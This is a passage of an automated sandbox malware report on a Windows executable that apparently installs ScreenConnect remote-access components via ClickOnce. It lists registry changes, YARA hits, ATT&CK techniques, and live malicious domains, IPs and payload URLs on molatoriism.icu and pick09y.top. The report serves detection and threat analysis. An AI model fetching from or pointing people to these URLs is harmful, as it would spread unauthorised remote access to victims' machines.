                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009C1806
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match | File source: 10.0.ScreenConnect.WindowsClient.exe.970000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: dfsvc.exe PID: 7480, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3320, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2316, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                  Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                  [Behavior graph: ID 1551436, Sample: pzPO97QouM.exe, Startdate: 07/11/2024, Architecture: WINDOWS, Score: 57]

                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  pick09y.top | 62.182.85.100 | true | false | | unknown
                  s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
                  molatoriism.icu | 104.21.96.148 | true | false | | unknown
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.Core.dll | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.Client.dll | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dll | false | Avira URL Cloud: phishing | unknown
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe | false | Avira URL Cloud: phishing | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                    http://Passport.NET/STSsvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.application17dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.application08904lScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2234906229.000001674DFCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.w3.odfsvc.exe, 00000001.00000002.2234906229.000001674E56B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E55B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://molatoriism.icu/Bin/ScreenConnect.Core.dllFdfsvc.exe, 00000001.00000002.2246395181.000001676A541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: phishing
                                                                                                              unknown
                                                                                                              http://Passport.NET/tbsvchost.exe, 00000008.00000002.2594659403.000002001D072000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exel7dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                          unknown
                                                                                                                          https://molatoriism.icu/Bin/ScreenConnect.Client.application04ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                          unknown
                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://molatoriism.icu/Bin/ScreenConnect.ClientSedfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                unknown
                                                                                                                                https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeL6#f4dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000008.00000003.1398602624.000002001D929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationZ.L04re=ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                      unknown
                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2234906229.000001674DFCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoasvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scstsvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/Micdfsvc.exe, 00000001.00000002.2244136075.0000016766F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.ClientService.exePdfsvc.exe, 00000001.00000002.2245764625.00000167687C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                      unknown
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.96.148 | molatoriism.icu | United States | 13335 | CLOUDFLARENETUS | false
62.182.85.100 | pick09y.top | Ukraine | 205172 | YANINA-ASUA | false
                                                                                                                                                      IP
                                                                                                                                                      127.0.0.1
                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                      Analysis ID:1551436
                                                                                                                                                      Start date and time:2024-11-07 17:54:59 +01:00
                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 7m 30s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                      Number of analysed new started processes analysed:17
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample name:pzPO97QouM.exe
                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                      Original Sample Name:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal57.evad.winEXE@18/75@2/3
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 65%
                                                                                                                                                      • Number of executed functions: 183
                                                                                                                                                      • Number of non-executed functions: 26
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
